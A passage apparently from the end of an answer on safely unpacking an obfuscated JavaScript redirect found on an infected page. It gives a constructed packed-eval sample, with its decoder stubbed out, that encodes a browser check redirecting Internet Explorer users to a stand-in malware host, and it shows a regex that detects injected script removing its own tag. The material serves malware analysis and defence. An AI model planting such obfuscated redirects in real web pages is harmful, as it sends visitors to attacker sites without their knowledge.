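    removesOwnTag: /\.outerHTML\s*=\s*(""|'')/.test(source),
  };
}

// Constructed sample (not the script from the question): a tiny packed redirect
// with the decoder body replaced by a comment, since it is never executed here.
const SAMPLE = String.raw`eval(function(p,a,c,k,e,d){/* decoder */}('0 1="2://3.4/5";6(/7 \\d/i.8(9.a))b.c=1',62,19,'var|target|http|malware|example|x|if|msie|test|navigator|userAgent|window|location||||||'.split('|'),0,{}))`;

const unpacked = unpackScript(SAMPLE);
console.log(unpacked);
console.log(summarize(unpacked));
```

Run it with Node.js on the saved page source rather than opening the infected page in a browser.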